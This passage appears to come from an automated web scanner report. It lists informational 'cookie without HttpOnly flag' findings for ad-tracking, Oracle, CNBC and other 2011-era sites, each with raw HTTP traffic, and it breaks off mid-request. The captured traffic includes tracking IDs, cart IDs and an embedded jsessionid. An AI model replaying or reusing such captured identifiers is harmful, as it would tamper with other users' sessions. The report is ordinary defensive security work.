Set-Cookie: cre=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clk=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 17:06:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



13.71. http://clk.fetchback.com/serve/fb/engmnt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/engmnt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/engmnt HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 17:06:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



13.72. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:13 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/i/blank.gif
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


13.73. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/examples
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:34:07 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/i/blank.gif
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


13.74. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:13 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


13.75. http://d.ads.readwriteweb.com/ck.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.ads.readwriteweb.com
Path:   /ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ck.php HTTP/1.1
Host: d.ads.readwriteweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


13.76. http://d.ads.readwriteweb.com/spc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.ads.readwriteweb.com
Path:   /spc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spc.php?zones=sp_1L%3D2%7Csp_1R%3D3%7Csp_2L%3D4%7Csp_2R%3D5%7Csp_3L%3D6%7Csp_3R%3D7%7Csp_4L%3D8%7Csp_4R%3D9%7Csp_5L%3D10%7Csp_5R%3D11%7Csp_6L%3D12%7Csp_6R%3D13%7C&nz=1&source=&r=16694381&block=1&blockcampaign=1&charset=UTF-8&loc=http%3A//www.readwriteweb.com/enterprise/2010/11/oracle.php&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio HTTP/1.1
Host: d.ads.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 15:32:48 GMT; path=/
Content-Size: 8267
Connection: close
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 8267

var OA_output = new Array();
OA_output['sp_1L'] = '';
OA_output['sp_1L'] += "<"+"a href=\'http://d.ads.readwriteweb.com/ck.php?oaparams=2__bannerid=185451__zoneid=2__cb=5eaacf5574__r_id=da06d5023c8bd
...[SNIP]...

13.77. http://d1.openx.org/ck.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ck.php HTTP/1.1
Host: d1.openx.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=eed20980e83e7cfea7f31868510023af; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/
Content-Length: 0
Content-Type: text/html; charset=UTF-8


13.78. http://developers.facebook.com/plugins/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.195.105
Connection: close
Date: Tue, 06 Sep 2011 17:06:31 GMT
Content-Length: 0


13.79. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /cgi-bin/shopcart/viewcart.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/shopcart/viewcart.cgi HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: shopCartId=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: source=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: org_id=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: territoryCode=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: territoryCode=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: lang=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: org_id=1001; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: shopCartId=6496530; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: source=OU; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819944031981,1)
Date: Tue, 06 Sep 2011 15:59:33 GMT
Content-Length: 5316

<html>
<head>
<title>Oracle University: Empty Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<SCRIPT LANGUAGE="JavaScript">
var orgid = 1001;
var lan
...[SNIP]...

13.80. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/db_pages.getpage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pls/web_prod-plq-dad/db_pages.getpage?page_id=402&p_nl=ORSL&intcmp=WWOCOMINTMAINPAGEBNR HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 6859
Content-Type: text/html; charset=UTF-8
Set-Cookie: p_mcc=WWOCOMINTMAINPAGEBNR; domain=.oracle.com; path=/
Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/
Set-Cookie: p_lang=US; domain=.oracle.com; path=/
Set-Cookie: p_cur_URL=0; domain=.oracle.com; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057867188663244,0)
Date: Tue, 06 Sep 2011 15:59:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

13.81. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrect HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 204

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+"><"+"/iframe"+">"
...[SNIP]...

13.82. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=11792&type=mrect HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1315321216_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315321216_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: kwd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: scg=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: ppd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: act=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5114

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

13.83. http://lct.salesforce.com/sfga.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lct.salesforce.com
Path:   /sfga.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sfga.js HTTP/1.1
Host: lct.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:34:06 GMT
Set-Cookie: BIGipServerlct-pool=70574602.38687.0000; path=/
Content-Length: 9247

var _kd = document;
var _kdlh = _kd.location.href;
var _ki,_kq,_kv;
var _kwtlForm;
var _kretURL;
var _kwtlOnSubmit;
var _koid;

function __krand() {
return Math.round(Math.random() * 256).toString
...[SNIP]...

13.84. http://legolas.nexac.com/lgalt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legolas.nexac.com
Path:   /lgalt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgalt?ci=7&ti=73&sti=28&sei=0&sci=2&ai=0&mi=0&pbi=0&sts=1315321125460777&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: legolas.nexac.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: na_tc=Y; OAX=Mhd7ak48ZSEAAtYi

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 14:59:01 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: text/html; charset=iso-8859-1
Location: http://r.nexac.com/e/getdata.xgi?na_id=ignore&dt=br&pkey=mxpq23ivacz82&ru=http://rt.legolas-media.com/lgrt?ci=1%26ti=74%26vi=7%26sti=28%26sts=1315321125460777%26ui=fb069b82-5953-4473-8ae5-0a80415bcdc8%26na_id=<na_id>%26na_mp=<na_mp>%26na_da=<na_da>
Set-Cookie: lgtix=SQACADUB; path=/; expires=Fri, 05 Sep 2014 14:59:01 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 462
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://r.nexac.com/e/getdata.xgi?na_id=ignore&a
...[SNIP]...

13.85. https://login.cnbc.com/cas/logout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/logout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas/logout HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:04:31 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO2=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO3=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ws=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: snas=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_member_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_session_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_pass_hash=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_sna=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_enc=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://www.cnbc.com
Content-Language: en
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


13.86. https://login.oracle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; 